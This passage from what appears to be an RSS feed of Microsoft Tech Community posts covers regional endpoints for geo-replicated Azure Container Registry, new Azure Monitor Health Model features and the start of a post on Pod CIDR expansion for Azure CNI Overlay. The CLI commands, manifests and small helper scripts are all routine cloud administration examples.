&lt;LI&gt;You can use the global endpoint with automatic Azure-managed routing with health-aware failover, where Azure will route your requests to the geo-replica with the best network performance profile to the client.&lt;/LI&gt;
&lt;LI&gt;You can use a regional endpoint when you need explicit control or routing to a specific geo-replica.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Other resources:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;For the full background on &lt;EM&gt;why&lt;/EM&gt; regional endpoints exist and the problems they solve, see the &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-geo-replicated-azure-container-registries-private-preview/4496186" target="_blank" rel="noopener" data-lia-auto-title="private preview blog post" data-lia-auto-title-active="0"&gt;private preview blog post&lt;/A&gt;.&lt;/LI&gt;
&lt;LI&gt;For the complete operational deep dive — health-aware failover, throttling considerations, storage quota and pricing, eventual consistency, home region outage behavior, DNS propagation, private endpoint interaction, capacity planning, and monitoring guidance — see&amp;nbsp;&lt;A class="lia-external-url" href="https://gist.github.com/johnsonshi/0034f8fdc014da64242ffdb8b632709e" target="_blank" rel="noopener"&gt;How ACR geo-replication handles failover, failback, and traffic redirection&lt;/A&gt;.&lt;/LI&gt;
&lt;LI&gt;For the behind-the-scenes engineering implementation — architectural overview and the engineering system design of the feature — see &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/determinism-over-magic-the-engineering-design-behind-azure-container-registry-re/4524101" target="_blank" rel="noopener" data-lia-auto-title="Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints" data-lia-auto-title-active="0"&gt;Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints&lt;/A&gt;.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 id="getting-started"&gt;Getting started&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;Enable regional endpoints on an existing registry:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az acr update -n myregistry -g myrg --regional-endpoints enabled
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;View all registry endpoint URLs, including the registry global endpoint, geo-replica regional endpoints, and data endpoints:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az acr show-endpoints --name myregistry --resource-group myrg
&lt;/LI-CODE&gt;
&lt;H2&gt;Using regional endpoints&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;Authenticate to a specific regional endpoint:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az acr login --name myregistry --endpoint eastus
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;Push to a specific geo-replica.&lt;/STRONG&gt;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Images and tags pushed to a geo-replica via regional endpoints still propagate to all other geo-replicas under&amp;nbsp;&lt;U&gt;eventual consistency&lt;/U&gt;.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;LI-CODE lang="bash"&gt;docker tag   myapp:v1  myregistry.eastus.geo.azurecr.io/myapp:v1
docker push            myregistry.eastus.geo.azurecr.io/myapp:v1
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;Pull an image:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;docker pull myregistry.eastus.geo.azurecr.io/myapp:v1&lt;/LI-CODE&gt;
&lt;P&gt;You can specify regional endpoints directly in Kubernetes deployment manifests if you need to pin workloads to specific regions. This ensures clusters in specific regions always pull from their colocated replica, providing predictable routing and reduced latency.&lt;/P&gt;
&lt;P&gt;By using different regional endpoints in each cluster's manifests, you can choose to guarantee that each cluster pulls from its local replica instead of relying on Azure-managed routing.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;East US cluster deployment:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-eastus
spec:
  template:
    spec:
      containers:
      - name: myapp
        image: myregistry.eastus.geo.azurecr.io/myapp:v1&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;West Europe cluster deployment:&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-westeurope
spec:
  template:
    spec:
      containers:
      - name: myapp
        image: myregistry.westeurope.geo.azurecr.io/myapp:v1&lt;/LI-CODE&gt;
&lt;H2 id="when-to-use-regional-endpoints"&gt;When to use regional endpoints&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Scenario&lt;/th&gt;&lt;th&gt;What to do&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Most workloads&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Keep using the global endpoint (&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;). Health-aware failover handles routing automatically.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Pin AKS clusters to co-located replicas&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Use regional endpoint URLs in deployment manifests.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;CI/CD push-then-pull consistency&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Pin pushes to a regional endpoint to avoid eventual-consistency races.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Client-side failover&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Switch between regional endpoints based on your own health checks.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Capacity planning&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Spread workloads across multiple regional endpoints to avoid per-replica throttling.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Troubleshooting&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Target a specific geo-replica to reproduce or isolate an issue.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
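&lt;P&gt;The client-side failover row in the table above could look something like the sketch below. The endpoint names follow the URL pattern shown earlier, but pick_endpoint, the is_healthy callback, and the fallback to the global endpoint are assumptions made for illustration, not part of the ACR tooling.&lt;/P&gt;

```python
def regional_endpoint(registry, region):
    """Build a regional login server name from the documented URL pattern."""
    return f"{registry}.{region}.geo.azurecr.io"


def pick_endpoint(registry, regions, is_healthy):
    """Return the first regional endpoint whose health check passes.

    Falls back to the global endpoint so Azure-managed routing takes over.
    """
    for region in regions:
        endpoint = regional_endpoint(registry, region)
        if is_healthy(endpoint):
            return endpoint
    return f"{registry}.azurecr.io"


# Hypothetical health check: pretend East US is currently failing.
def fake_health_check(endpoint):
    return "eastus" not in endpoint


chosen = pick_endpoint("myregistry", ["eastus", "westeurope"], fake_health_check)
print(chosen)
```

&lt;P&gt;A real health check would probe the endpoint itself; how to do that reliably depends on your network setup and is left open here.&lt;/P&gt;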
&lt;H2 id="what-changed-from-private-preview"&gt;What changed from private preview&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Private preview&lt;/th&gt;&lt;th&gt;Public preview&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Feature flag registration required (&lt;CODE&gt;az feature register&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;No registration needed&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Subscription private preview enrollment and propagation wait&lt;/td&gt;&lt;td&gt;Immediately available to all Azure subscriptions for all Premium SKU registries in all Azure public cloud regions.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Separate CLI extension (&lt;CODE&gt;acrregionalendpoint&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Built into Azure CLI 2.86.0+ natively&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;No registry-level CLI flag&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;az acr update --regional-endpoints enabled&lt;/CODE&gt; enables regional endpoints for all geo-replicas&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; flag for controlling a geo-replica's global endpoint routing via &lt;CODE&gt;az acr replication update&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Flag for controlling a geo-replica's global endpoint routing renamed to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;No portal support&lt;/td&gt;&lt;td&gt;Native Azure portal support for enabling regional endpoints for new registries (during creation) and for existing registries&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Private preview docs in &lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure/acr&lt;/A&gt;&lt;/td&gt;&lt;td&gt;Full documentation on &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;MS 
Learn&lt;/A&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H3 id="enabling-regional-endpoints-in-the-azure-portal"&gt;Enabling regional endpoints in the Azure portal&lt;/H3&gt;
&lt;P&gt;You can enable regional endpoints directly from the Azure portal for both new registries (during creation) and existing registries:&lt;/P&gt;
&lt;P&gt;&lt;IMG src="https://gist.github.com/user-attachments/assets/ef9532ad-dfdc-47be-892b-dfbc5234f7f0" alt="Enabling regional endpoints in the Azure portal" width="1121" height="761" /&gt;&lt;/P&gt;
&lt;H2 id="if-you-were-in-the-private-preview"&gt;If you were in the private preview&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;1. Uninstall the CLI extension.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The private preview CLI extension conflicts with the built-in commands in Azure CLI 2.86.0+. Remove it:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az extension remove --name acrregionalendpoint
&lt;/LI-CODE&gt;
&lt;P&gt;Verify it's gone:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az extension list --query "[?name=='acrregionalendpoint']" -o table
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;2. Ensure you're running Azure CLI 2.86.0 or later.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Regional endpoints commands are available natively starting in Azure CLI 2.86.0. Check your version:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az version
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;3. Update scripts that use &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; for controlling global endpoint routing for a geo-replica.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The old flag name for controlling a geo-replica's global endpoint routing configuration is deprecated and will be removed in Azure CLI 2.87.0 (June 2026). Update to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Old (deprecated)
az acr replication update --registry myregistry --name westus \
  --region-endpoint-enabled false

# New
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing false
&lt;/LI-CODE&gt;
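&lt;P&gt;If the old flag appears in many automation scripts, the rename can be applied mechanically. The following is only a sketch: &lt;CODE&gt;rename_flag&lt;/CODE&gt; is a hypothetical helper that rewrites text arriving on standard input, and the sample command mirrors the example above. Review the rewritten scripts before committing them.&lt;/P&gt;

```shell
# Rewrites the deprecated flag name in whatever text arrives on standard input.
# rename_flag is a hypothetical helper, not an Azure CLI command.
rename_flag() {
  sed 's/--region-endpoint-enabled/--global-endpoint-routing/g'
}

old_command='az acr replication update --registry myregistry --name westus --region-endpoint-enabled false'

# Print the updated command; the flag value (false) is left untouched.
printf '%s\n' "$old_command" | rename_flag
```

&lt;P&gt;Only the flag name changes, so existing values passed to the flag carry over as they are.&lt;/P&gt;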
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Why the rename?&lt;/STRONG&gt; The old flag name &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; was confusing — it sounded like it controlled the &lt;EM&gt;regional endpoints&lt;/EM&gt; feature, but it &lt;EM&gt;actually controlled whether a geo-replica participates in global endpoint routing&lt;/EM&gt;. The new name &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; says exactly what it does. For a full breakdown of all three CLI flags and how they relate, see the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;endpoint reference&lt;/A&gt;.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="learn-more"&gt;Learn more&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Full documentation&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;Geo-replication in Azure Container Registry — Regional endpoints&lt;/A&gt; — prerequisites, CLI commands, network considerations, private endpoint integration, and troubleshooting.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Operational deep dive&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://gist.github.com/johnsonshi/0034f8fdc014da64242ffdb8b632709e" target="_blank" rel="noopener"&gt;How ACR geo-replication handles failover, failback, and traffic redirection&lt;/A&gt; — health-aware failover, throttling, eventual consistency, DNS considerations, monitoring, pricing, and a full walkthrough.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Behind-the-scenes engineering implementation&lt;/STRONG&gt;: &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/determinism-over-magic-the-engineering-design-behind-azure-container-registry-re/4524101" target="_blank" rel="noopener" data-lia-auto-title="Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints" data-lia-auto-title-active="0"&gt;Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints&lt;/A&gt; — architectural details and the engineering system design behind the feature.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Endpoint reference&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;Azure Container Registry endpoint reference&lt;/A&gt; — all endpoint types, URL formats, and CLI flags in one place.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Private endpoints&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-private-endpoints" target="_blank" rel="noopener"&gt;Connect privately to a registry using private endpoints&lt;/A&gt; — IP allocation math, subnet sizing, and NIC queries for registries with regional endpoints.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Firewall rules&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-firewall-access-rules" target="_blank" rel="noopener"&gt;Configure firewall access rules&lt;/A&gt; — which FQDNs to allow for regional endpoints.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 id="feedback"&gt;Feedback&lt;/H2&gt;
&lt;P&gt;We'd love to hear how you're using regional endpoints and what we can improve. Reach out via:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure Container Registry GitHub repository&lt;/A&gt; — issues, feature requests, and discussion&lt;/LI&gt;
&lt;LI&gt;Azure portal feedback — use the feedback button in the Azure portal on your registry's page&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Regional endpoints are on the path to GA. Your feedback directly shapes the feature's direction.&lt;/P&gt;</description>
      <pubDate>Fri, 05 Jun 2026 06:12:53 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/regional-endpoints-for-azure-container-registry-geo-replication/ba-p/4525717</guid>
      <dc:creator>johnsonshi_msft</dc:creator>
      <dc:date>2026-06-05T06:12:53Z</dc:date>
    </item>
    <item>
      <title>Azure Monitor Health Model (Preview): What's New!</title>
      <link>https://techcommunity.microsoft.com/t5/azure-observability-blog/azure-monitor-health-model-preview-what-s-new/ba-p/4525707</link>
      <description>&lt;P&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/overview" target="_blank"&gt;Azure Monitor Health Model&lt;/A&gt; is a modern observability capability that brings together the telemetry, architecture, and business context of your workloads to generate health insights. It continuously aggregates signals across dependencies, producing a &lt;STRONG&gt;single, actionable health state&lt;/STRONG&gt; that reduces alert noise and shifts teams toward proactive operations with a cohesive system view, clearer insights, and faster troubleshooting.&lt;/P&gt;
&lt;P&gt;It addresses two common operational questions: &lt;STRONG&gt;'Is my system/service/app healthy?'&lt;/STRONG&gt; and &lt;STRONG&gt;'Which underlying unit or component is impacting health?'&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;This refresh introduces flexible, workload-centric discovery (use Application Insights topology and Azure Resource Graph queries in addition to designing user and system flows) and smarter, faster health signal creation (use recommended signals, import existing alert rules, and set dynamic thresholds).&lt;/P&gt;
&lt;H2&gt;Expanded Discovery Scope&lt;/H2&gt;
&lt;P&gt;As customers began modeling increasingly complex applications, we identified an opportunity to make discovery more flexible and intuitive. Teams naturally reason about their systems differently: some at the application level, others through infrastructure fleets or telemetry views. By expanding discovery options, we enable customers to build health models using the constructs they already use, making it easier to evolve health models as applications and architectures change.&lt;/P&gt;
&lt;P&gt;Azure Monitor health models now support multiple discovery mechanisms:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Application Insights–based discovery &lt;/STRONG&gt;for application-centric modelling&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure Resource Graph (ARG) discovery &lt;/STRONG&gt;for scalable, query-based resource selection&lt;/LI&gt;
&lt;LI&gt;Continued support for &lt;STRONG&gt;Service Groups&lt;/STRONG&gt;, now including nested Service Groups, as part of a broader set of discovery options&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This evolution reflects a shift toward loosely coupled modelling, enabling customers to define health based on application architecture rather than infrastructure-centric grouping. &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/discoveries?tabs=app-insights#discovery-types" target="_blank"&gt;Learn more about Discovery&lt;/A&gt;&lt;/P&gt;
&lt;img&gt;Discovery Rule&lt;/img&gt;
&lt;H2&gt;Extended Health Signals&lt;/H2&gt;
&lt;P&gt;Our goal has been to help customers achieve meaningful health insights faster with less manual effort. By introducing platform defaults and surfacing recommended signals, we make it easier to align health models with proven Azure best practices from day one. At the same time, we preserve support for existing alerting strategies and investments, ensuring customers can extend rather than replace what they already have. These enhancements balance simplicity, guidance, and flexibility as environments scale.&lt;/P&gt;
&lt;P&gt;Health Models now support the following health signal capabilities:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health as a default signal&lt;/STRONG&gt;, ensuring every model starts with a reliable platform-provided baseline&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Recommended signals&lt;/STRONG&gt;, automatically surfaced based on Azure service best practices and enhanced through Azure Monitor Baseline Alerts (AMBA) integration&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Reuse of existing signals&lt;/STRONG&gt;, enabled by importing &lt;U&gt;Azure Monitor alert rules&lt;/U&gt; as health signals&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/signals?tabs=azureresource#add-signal-assignment" target="_blank"&gt;Learn more about Signals&lt;/A&gt;&lt;/P&gt;
&lt;img&gt;Signals - Recommended and Import from Alert Rules for Azure Resources&lt;/img&gt;
&lt;H2&gt;Introducing Health Aggregation Rules&lt;/H2&gt;
&lt;P&gt;Modern cloud applications are built for resiliency, redundancy, and tolerance of partial failure. Health Models are designed to reflect this reality by enabling customers to define what “healthy” means for their architecture. Flexible aggregation rules allow teams to model intent rather than individual component states, producing health views that better align with operational priorities and business impact.&lt;/P&gt;
&lt;P&gt;Health Models now support advanced aggregation logic, enabling scenarios such as:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional resiliency aggregation&lt;/STRONG&gt; using numeric thresholds (e.g., 2 out of 4 regions must remain healthy)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Cluster and fleet health aggregation&lt;/STRONG&gt; using percentage thresholds (e.g., 60% of VMs in a cluster must be healthy)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This enables modelling resiliency patterns, partial failures, and graceful degradation, providing a more accurate view of real business impact.&lt;/P&gt;
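&lt;P&gt;The two threshold styles above can be sketched as simple comparisons. This is an illustration only, not the Health Models API: the function names &lt;CODE&gt;count_rule&lt;/CODE&gt; and &lt;CODE&gt;percent_rule&lt;/CODE&gt;, the two-state Healthy/Unhealthy result, and the sample counts are all assumptions made for the example.&lt;/P&gt;

```shell
# Illustrative only: count_rule, percent_rule, and the Healthy/Unhealthy labels
# are assumptions for this sketch, not the Health Models API.

# Numeric threshold: $1 = healthy children, $2 = minimum that must be healthy.
count_rule() {
  if [ "$1" -ge "$2" ]; then echo Healthy; else echo Unhealthy; fi
}

# Percentage threshold: $1 = healthy children, $2 = total children,
# $3 = minimum healthy percentage. Cross-multiplying keeps the
# comparison in integer arithmetic.
percent_rule() {
  if [ $(( $1 * 100 )) -ge $(( $2 * $3 )) ]; then echo Healthy; else echo Unhealthy; fi
}

count_rule 3 2         # 3 of 4 regions healthy, at least 2 required
percent_rule 5 10 60   # 5 of 10 VMs healthy, at least 60% required
```

&lt;P&gt;With these sample inputs the first call reports Healthy and the second reports Unhealthy, because 5 of 10 VMs is 50%, which is below the 60% threshold.&lt;/P&gt;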
&lt;H2&gt;Import Custom Signal&lt;/H2&gt;
&lt;P&gt;Health is most valuable when it reflects both system behavior and application context. By enabling custom health inputs, customers can incorporate signals that are closest to their business logic and application state. Contextual annotations further enrich analysis, making health timelines easier to interpret and correlate with change events.&lt;/P&gt;
&lt;P&gt;To support this, Health Models now provide:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Custom health report ingestion&lt;/STRONG&gt; for external application and system health signals&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Data annotations&lt;/STRONG&gt; to overlay deployments, incidents, and configuration changes on health state&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Alert Experience&lt;/H2&gt;
&lt;P&gt;To learn about health state changes proactively, health models let you create &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/alerts" target="_blank"&gt;alert rules&lt;/A&gt; whose associated action groups trigger automated responses, such as notifying a user. You can now also view all the alerts on a health model and start troubleshooting.&lt;/P&gt;
&lt;img&gt;Alerts in Health Model&lt;/img&gt;
&lt;PRE&gt;&lt;STRONG&gt;Note: To use these new capabilities, upgrade your health models to the new API version using the built-in migration wizard in the Azure portal for a simple, guided experience.&lt;/STRONG&gt;&lt;/PRE&gt;</description>
      <pubDate>Fri, 05 Jun 2026 01:30:56 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-observability-blog/azure-monitor-health-model-preview-what-s-new/ba-p/4525707</guid>
      <dc:creator>shijain13</dc:creator>
      <dc:date>2026-06-05T01:30:56Z</dc:date>
    </item>
    <item>
      <title>Pod CIDR Expansion Generally Available and IP Address Planning on Azure CNI Overlay</title>
      <link>https://techcommunity.microsoft.com/t5/azure-networking-blog/pod-cidr-expansion-generally-available-and-ip-address-planning/ba-p/4521700</link>
      <description>&lt;div data-video-id="https://youtu.be/XC5MMt4MZqo?si=_4oCc2bbg-Ch4MAN/1779317204448" data-video-remote-vid="https://youtu.be/XC5MMt4MZqo?si=_4oCc2bbg-Ch4MAN/1779317204448" class="lia-video-container lia-media-is-center lia-media-size-large"&gt;&lt;iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2FXC5MMt4MZqo%3Ffeature%3Doembed&amp;amp;display_name=YouTube&amp;amp;url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DXC5MMt4MZqo&amp;amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FXC5MMt4MZqo%2Fhqdefault.jpg&amp;amp;type=text%2Fhtml&amp;amp;schema=youtube" allowfullscreen="" style="max-width: 100%"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;P&gt;With Azure CNI Overlay networking, the cluster-wide pod CIDR is logically partitioned into smaller per-node blocks, and Azure assigns each node a fixed /24 slice. This decouples pod networking from the VNet address space entirely, because pods receive addresses from a private CIDR that is separate from the VNet.&lt;/P&gt;
&lt;P&gt;By default, Azure CNI Overlay uses a pod CIDR of 10.244.0.0/16 which provides 65,536 addresses. Since each node consumes 256 addresses from the /24 slice, the default cluster has a node scaling limit of 65,536 divided by 256, or 256 nodes. Choosing a pod CIDR at cluster creation effectively sets an upper bound on how many nodes the cluster can accommodate.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Pod CIDR&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Per-Node Block&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Max Nodes Supported&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;/16&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;/24&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;256&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;/15&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;/24&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;512&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;/14&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;/24&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;1,024&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
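&lt;P&gt;The arithmetic behind the table can be reproduced with a few lines of shell. This is a minimal sketch that assumes the fixed /24 per-node block described above; &lt;CODE&gt;max_nodes&lt;/CODE&gt; is a hypothetical helper name, not part of any Azure tooling.&lt;/P&gt;

```shell
# Estimates the node limit for a pod CIDR when every node takes a fixed /24 block.
# max_nodes is a hypothetical helper; $1 is the pod CIDR prefix length (for example 16).
max_nodes() {
  bits=$(( 24 - $1 ))   # prefix bits left over for numbering /24 blocks
  if [ "$bits" -lt 0 ]; then
    echo 0              # a pod CIDR smaller than /24 cannot hold a full node block
    return
  fi
  nodes=1
  while [ "$bits" -gt 0 ]; do
    nodes=$(( nodes * 2 ))   # each extra bit doubles the number of /24 blocks
    bits=$(( bits - 1 ))
  done
  echo "$nodes"
}

for prefix in 16 15 14; do
  echo "/$prefix pod CIDR supports up to $(max_nodes "$prefix") nodes"
done
```

&lt;P&gt;Each bit removed from the pod CIDR prefix doubles the number of /24 blocks, which is why moving from /16 to /15 doubles the node limit from 256 to 512.&lt;/P&gt;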
&lt;H2&gt;What does Pod CIDR Expansion enable?&lt;/H2&gt;
&lt;P&gt;Even with careful upfront planning, long-lived clusters grow in ways that are difficult to anticipate. For organizations using Azure CNI Overlay, outgrowing the pod CIDR previously meant a difficult migration unless IP planning had been meticulous.&lt;/P&gt;
&lt;P&gt;Pod CIDR expansion allows you to expand the existing CIDR without downtime or node reimaging. Instead of being locked to the range chosen at cluster creation, operators can expand the available pod address space with minimal operational burden.&lt;/P&gt;
&lt;H2&gt;Choosing a Pod CIDR&lt;/H2&gt;
&lt;P&gt;In addition to node scaling limits, there are other considerations for pod CIDR planning:&lt;/P&gt;
&lt;UL&gt;
